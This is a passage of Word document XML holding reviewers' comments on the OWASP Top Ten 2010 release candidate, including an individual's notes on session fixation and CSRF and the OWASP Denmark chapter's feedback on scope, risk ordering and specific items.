            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>c) PCI DSS refers to "Top Ten" not "Top 10"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>d) The project pages uses "OWASP Top Ten for 2010"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>e) The short URL in the document is "http://www.owasp.org/index.php/Topten"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidTr="00C45ADB">
        <w:trPr>
          <w:trHeight w:val="1848"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642"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E32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Extra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6048" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00C03D5B" w:rsidRPr="00C03D5B" w:rsidRDefault="00C03D5B" w:rsidP="00C03D5B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The document is an important publicity item.  Our testimonials page is not yet ready, but is it worth linking to the citations page from the text?</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>http://www.owasp.org/index.php/Industry:Citations</w:t>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C03D5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>One place might be the phrase "many more" in the second paragraph of the Foreword.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C03D5B" w:rsidRDefault="00C03D5B" w:rsidP="00C03D5B"/>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="007B2E45" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="003D6909">
        <w:t xml:space="preserve">Alejandro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D6909">
        <w:t>Rusell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Hello,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>I just found yesterday a reference to the OWASP Top Ten 2010 RCL and immediately dove into it. Excellent work!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>I would like to state the following comments about it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Regarding the A2 risk, in the business impact analysis, I would add the consideration of the way being used as an attack vector may impact in the business image and its legal liabilities. I mention this as this attack's target is the user and not necessarily the server. This observation also applies to the A8 risk for the same reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Regarding the A3 risk, I'd add a reference to "session fixation" issues as an attack vector. I understand that no detailed attacks are presented in the description, but considering that most of the frameworks used nowadays are vulnerable out of the box, it is a major issue worth at least a subtle reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>I'd add also an item to the list Am I vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>6. Does the system accept existing (pre-login) session IDs? / Does the system reuse existing (pre-login) session IDs?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Something should be added to the How Do I Prevent This, too.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>By the way, the Item 3 of the How Do I Prevent This box refers to A5 (CSRF) as a sample of XSS used to steal session IDs. Shouldn't it point to A2, instead? CSRF, as far as I understand it, is used to actually perform transactions in the context of a (logged in) user, not to execute code in their browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Regards,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alejandro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rusell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="003D6909" w:rsidP="003D6909">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45ADB" w:rsidRDefault="007B2E45" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="003D6909">
        <w:t xml:space="preserve">OWASP Denmark Chapter Comments (submitted by Ulf </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D6909">
        <w:t>Munkedal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D6909">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D6909" w:rsidRDefault="00662E80" w:rsidP="003D6909">
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hi Dave (&amp; lists),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the official input from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denmark chapter regarding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RC</w:t>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following was discussed and collected at a meeting in Copenhagen on the 14th of December 2009. The participants were </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>appx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. 15 members with various developer and security backgrounds from a broad spectrum of companies that had met with the suggested Top 10 rc1 as the specific purpose.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>General comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In general we find the suggested Top 10 to be a great improvement over the old one. We do however have some suggested improvements and one serious concern (the new A6) as you can see in our input below.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Scope section.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> We suggest having a scoping section in the beginning of the document so it is clear which risks the Top 10 are related to. This idea actually came about as we were walking through Dave’s presentation from DC, where he has a drawing of what in relation to an application that can be attacked by a hacker. We believe that a scoping section (e.g. just the drawing from the presentation and a few words) would make it clearer to everyone what risks we are talking about and make the Top 10 easier to </w:t>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>understand.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Order of the risks.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The order of which the risks are listed in the document is not clear. The document indicates that the highest risks are listed first but when the “Notes about risk” on page 20 are used to calculate the risks values, then the following questions arise in relation the order of the risks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Why is A2 stated before A3 when the calculated risk for A3 is 2.0 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and A2 has 2.6?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Why is A8 stated before A9 when the calculated risk for A9 is </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.0 and A8 is 4.0?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Overview table.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It could also benefit the document if there was created an overview table with Exploitability, Prevalence, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Impact listed for all the risks in one compiled table. This would give a good overview of the risks and all their main parameters.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Comments on individual risks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Should include a few words about error handling, since lack of error handling makes it significantly easier to exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- The word “Impact” is missing under Technical Impacts.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> should in our opinion be “average” because it does require a manual activity to validate the vulnerability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- We think that A6 is completely out of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope and therefore needs to be reconsidered. If basic system security is included in this broad sense we move outside the application and then where do we stop? Then physical security should be added and that doesn’t make sense. Also it is so fluffy and vaguely described that this needs to be rethought. Consider that the PCI standard refers to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00662E80">
        <w:rPr>
